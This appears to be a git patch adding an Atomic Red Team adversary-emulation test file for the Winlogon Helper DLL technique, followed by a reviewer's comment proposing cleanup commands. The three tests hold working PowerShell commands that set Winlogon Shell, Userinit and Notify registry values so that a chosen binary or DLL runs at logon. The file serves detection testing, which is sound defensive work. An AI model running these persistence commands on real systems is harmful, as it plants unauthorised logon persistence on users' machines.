From 0f576dd03fbe63b4a1a30c4e7f0e4abfaf85bb00 Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Thu, 13 Dec 2018 10:06:28 -0600
Subject: [PATCH] T1004 Winlogon Helper DLLs (#427)
---
atomics/T1004/T1004.yaml | 59 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 atomics/T1004/T1004.yaml
diff --git a/atomics/T1004/T1004.yaml b/atomics/T1004/T1004.yaml
new file mode 100644
index 00000000..63e470e1
--- /dev/null
+++ b/atomics/T1004/T1004.yaml
@@ -0,0 +1,59 @@
+---
+attack_technique: T1004
+display_name: Winlogon Helper DLL
+
+atomic_tests:
+- name: Winlogon Shell Key Persistence - PowerShell
+ description: |
+ PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ binary_to_execute:
+ description: Path of binary to execute
+ type: Path
+ default: C:\Windows\System32\cmd.exe
+
+ executor:
+ name: powershell
+ command: |
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+- name: Winlogon Userinit Key Persistence - PowerShell
+ description: |
+ PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ binary_to_execute:
+ description: Path of binary to execute
+ type: Path
+ default: C:\Windows\System32\cmd.exe
+
+ executor:
+ name: powershell
+ command: |
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+- name: Winlogon Notify Key Logon Persistence - PowerShell
+ description: |
+ PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ binary_to_execute:
+ description: Path of notification package to execute
+ type: Path
+ default: C:\Windows\Temp\atomicNotificationPackage.dll
+
+ executor:
+ name: powershell
+ command: |
+ New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
+ Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
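Review bot: None of the three `executor` blocks carries a `cleanup_command`, so every run leaves the HKCU Winlogon `Shell`, `Userinit` or `Notify\logon` value pointing at `#{binary_to_execute}` after the test finishes, and the `Shell` value in particular is one Windows may honor at the user's next logon. A cleanup entry next to each `command` that removes the value (or, for the third test, the `Notify` key the test itself creates) restores the profile; this assumes the values were absent beforehand, which I believe is the case on a stock profile, so reading and restoring any pre-existing value would be the stricter option. The third test's `description` would also benefit from noting that, as far as I know, Winlogon notification packages are only loaded by pre-Vista Winlogon, so on current Windows the test exercises the registry write rather than an actual DLL load.
```yaml
# … unchanged: attack_technique, display_name, first test's description and input_arguments …
  executor:
    name: powershell
    command: |
      Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
    cleanup_command: |
      Remove-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" -Force -ErrorAction SilentlyContinue
# … unchanged: second test up to and including its command …
    cleanup_command: |
      Remove-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" -Force -ErrorAction SilentlyContinue
# … unchanged: third test up to and including its command …
    cleanup_command: |
      Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Recurse -Force -ErrorAction SilentlyContinue
```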